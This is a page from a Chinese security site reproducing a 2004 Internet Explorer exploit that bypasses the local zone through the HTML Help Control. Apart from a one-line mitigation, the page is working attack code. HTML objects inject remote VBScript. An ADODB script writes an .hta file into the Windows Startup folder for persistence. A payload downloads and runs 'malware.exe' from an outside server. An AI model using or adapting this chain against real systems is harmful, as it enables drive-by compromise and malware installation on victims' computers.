首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Internet Explorer(<= XP SP2) HTML Help Control Local Zone Bypass Exploit
来源:vfocus.net 作者:vfocus 发布时间:2004-12-26  

Internet Explorer (<= XP SP2) HTML Help Control Local Zone Bypass Exploit

Solution : Set the security level for all zones to "High" in Internet Explorer

// sp2rc.htm //

<OBJECT id="localpage" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:\WINDOWS\
PCHealth\HelpCtr\System\blurbs\tools.htm">
</OBJECT>
<OBJECT id="inject" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:
execScript("document.write(\"<script language=\\\"vbscript\\\"
src=\\\"http://site/writehta.txt\\\"\"+String.fromCharCode(62)+\"
</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>

<script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>

// writehta.txt //

Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://server;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs =CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
rs.Save
"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta",
adPersistXML
// Spanish \Documents and Settings\All Users\Menu Inicio\Programas\Inicio\
// French \Documents and Settings\All Users\Menu D閙arrer\Programmes\D閙arrage
// Danish \Documents and Settings\All Users\Menuen Start\Programmer\Start\
// Dutch \Documents and Settings\All Users\Menu Start\Programma's\Opstarten\
// Polish \Documents and Settings\All Users\Menu Start\Programy\Autostart\
// Italian \Documents and Settings\All Users\Menu Avvio\Programmi\Esecuzione automatica\
// Finn \Documents and Settings\All Users\Kaynnista-valikko\Ohjelmat\Kaynnistys\
// Turkish \Documents and Settings\All Users\Start Menu\Programlar\BASLANGIC\ Turkish
// Norwegian \Documents and Settings\All Users\Start-meny\Programmer\Oppstart\
// Swedish \Documents and Settings\All Users\Start-menyn\Program\Autostart\
// Portuguese \Documents and Settings\All Users\Menu Iniciar\Programas\Iniciar\
// German \Dokumente und Einstellungen\All Users\Startmenu\Programme\Autostart\
rs.close
conn.close
window.close

// f00bar.txt //

"meaning less shit i had to put here"
"<script language=vbscript> crap = """
""": on error resume next: crap = """
""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
""" : o.open ""GET"",""http://server/malware.exe"",False : crap="""
""" : o.send : crap="""
""" : set s = createobject(""adodb.stream"") : crap="""
""" : s.type=1 : crap="""
""" : s.open : crap="""
""" : s.write o.responseBody : crap="""
""" : s.savetofile ""C:\malware.exe"",2 : crap="""
""" : Set ws = CreateObject(""WScript.Shell"") : crap="""
""" : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""
"""</script> crap="""



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Crystal FTP Pro v2.8 Remote Bu
·Santy.b - phpBB <= 2.0.10 B
·SHOUTcast DNAS/Linux v1.9.4 fo
·Santy.c - PHP Scripts Automate
·Solaris 7/8/9 CDE LibDTHelp Lo
·PhpInclude.Worm - PHP Scripts
·Solaris 7/8/9 CDE LibDTHelp Lo
·Internet Explorer Remote Comma
·Linux Kernel 2.6.x sys_chown()
·MySQL UDF Dynamic Library Expl
·Internet Explorer and MSN Mess
·Phpbb < 2.011 and php <
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved